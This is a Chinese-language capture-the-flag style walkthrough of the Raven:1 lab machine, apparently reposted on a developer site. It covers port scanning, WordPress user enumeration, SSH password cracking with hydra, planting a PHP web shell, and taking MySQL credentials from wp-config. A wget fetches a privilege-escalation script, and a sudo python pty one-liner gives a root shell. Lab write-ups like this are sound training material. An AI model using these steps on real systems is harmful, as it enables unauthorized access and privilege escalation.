渗透测试实战-Raven:1靶机入侵

栏目: 数据库 · 发布时间: 6年前

内容简介:大家好!爱写靶机渗透文章的我又来了,该靶机被设计者定义为初级-中级,最后小弟完成整个渗透的时候也的确是比较简单的;但是中间设计者设计了一个坑,小弟在那里被困了好几天,都塌喵的开始怀疑人生了。下面会介绍,本靶机设计者一共设置了4个flag,本次入侵也已拿到4个flag和root权限为止。Raven:1靶机下载:

渗透测试实战-Raven:1靶机入侵

前言

大家好!爱写靶机渗透文章的我又来了,该靶机被设计者定义为初级-中级,最后小弟完成整个渗透的时候也的确是比较简单的;但是中间设计者设计了一个坑,小弟在那里被困了好几天,都塌喵的开始怀疑人生了。下面会介绍,本靶机设计者一共设置了4个flag,本次入侵也已拿到4个flag和root权限为止。

靶机安装/下载

Raven:1靶机下载: https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtg

靶机IP: 172.16.24.37

渗透测试实战-Raven:1靶机入侵

实战

第一步老规矩探测ip:

渗透测试实战-Raven:1靶机入侵

已经知道了ip,下一步就是使用nmap探测靶机开放的端口了,如图:

渗透测试实战-Raven:1靶机入侵

通过上面的端口探测可以看到,该靶机开放了多个端口,我们还是老规矩以80端口作为突破口

渗透测试实战-Raven:1靶机入侵

下一步进行目录猜解,本次使用gobuster 工具完成

渗透测试实战-Raven:1靶机入侵

我们在 http://172.16.24.37/service.html 拿到了第一个flag,在源代码262行处,如图:

渗透测试实战-Raven:1靶机入侵

flag1{b9bbcb33e11b80be759c4e844862482d}

通过刚刚的目录猜解,我在/vendor目录下发现了 PHPMailerAutoload.php,通过搜索发现存在一个PHPmailer的任意命令执行漏洞,然后小弟就一顿操作一顿修改exp,

渗透测试实战-Raven:1靶机入侵

(注:这里的绝对路径在 http://172.16.24.37/vendor/PATH

渗透测试实战-Raven:1靶机入侵

小弟还不死心,直接手动测试,如图:

渗透测试实战-Raven:1靶机入侵

依然出错,在这里小弟被卡了好几天,一度怀疑是不是靶机设计者设计错了,最后忘记是用哪款扫描器,扫描到了zip文件,地址: http://172.16.24.37/contact.zip ,下载来后通过查看源代码发现,该源码里写入的地址是错的,这也就说我一直没法利用该漏洞的原因,如图:

渗透测试实战-Raven:1靶机入侵

最后小弟把目光放在/wordpress 上,老规矩使用wpsan怼一波,如图:

渗透测试实战-Raven:1靶机入侵

未发现可利用漏洞,但是出来2个账户“michael”、“steven”

下面我们加载这2个账户来破解其ssh密码,各位也可以使用msf来完成

小弟这里使用hydra:

渗透测试实战-Raven:1靶机入侵

破解出来密码:“michael”、“michael”

即能成功登陆ssh,

渗透测试实战-Raven:1靶机入侵

下一步就是拿flag了,flag2在 /var/www/ 目录下,如图:

渗透测试实战-Raven:1靶机入侵

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

下面为了演示方便,小弟上了一个 php 大马在/wordpress目录下,

渗透测试实战-Raven:1靶机入侵

下一步就是提权了,在/wordpress/wp_config.php 里拿到 mysql 的账户密码,如图:

渗透测试实战-Raven:1靶机入侵

mysql账户密码为:“root”、“R @v3nSecurity

到了这里肯定要小伙伴要问了,前面端口探测不是看到靶机没开3306端口吗?其实它只是为了防止外部访问罢了,我们使用 shell 查看,即可知道,如图:

渗透测试实战-Raven:1靶机入侵

下面肯定是通过mysql提权啊,我们使用php大马来操作mysql,方便大家阅读

渗透测试实战-Raven:1靶机入侵

渗透测试实战-Raven:1靶机入侵

拿到了flag3{afc01ab56b50591e7dccf93122770cd2}

小弟也在/tmp目录下,上传了一个提权辅助脚本,命令:

wget https://www.securitysift.com/download/linuxprivchecker.py

渗透测试实战-Raven:1靶机入侵

通过提权脚本我们可以看到,我们可以使用mysql来完成提权,该方法的提权具体操作,见代码注释处,如图:

渗透测试实战-Raven:1靶机入侵

脚本地址: https://www.exploit-db.com/exploits/1518/

小弟这里使用另外一种方法提权,刚刚我们已经得到了另外一个账户“steven”的hash值,下一步我们破解这个hash

得到破解密码:pink84

下面我们切换到steven账户

渗透测试实战-Raven:1靶机入侵

下一步输入命令:sudo -l

渗透测试实战-Raven:1靶机入侵

可以看到python,可以直接绕过root,下面只需要输入命令

sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

渗透测试实战-Raven:1靶机入侵

成功拿到flag和root_shell

总结

通过这篇文章小伙伴们应该也看到了,该靶机其实挺简单的,但是小弟在前面被不知是设计者的故意挖坑还是失望留的坑,困了好几天,一直无法突破。所以说小伙伴们以后在真实环境中如果碰到无法突破的点,可以先试着跳出来看看其他的是否有突破口呐?

最后祝大家生活愉快,感谢观看!


以上所述就是小编给大家介绍的《渗透测试实战-Raven:1靶机入侵》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

社交网站的数据挖掘与分析

社交网站的数据挖掘与分析

Matthew A. Russell / 师蓉 / 机械工业出版社 / 2012-2 / 59.00元

Facebook、Twitter和LinkedIn产生了大量宝贵的社交数据,但是你怎样才能找出谁通过社交媒介正在进行联系?他们在讨论些什么?或者他们在哪儿?这本简洁而且具有可操作性的书将揭示如何回答这些问题甚至更多的问题。你将学到如何组合社交网络数据、分析技术,如何通过可视化帮助你找到你一直在社交世界中寻找的内容,以及你闻所未闻的有用信息。 每个独立的章节介绍了在社交网络的不同领域挖掘数据的......一起来看看 《社交网站的数据挖掘与分析》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

随机密码生成器
随机密码生成器

多种字符组合密码

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具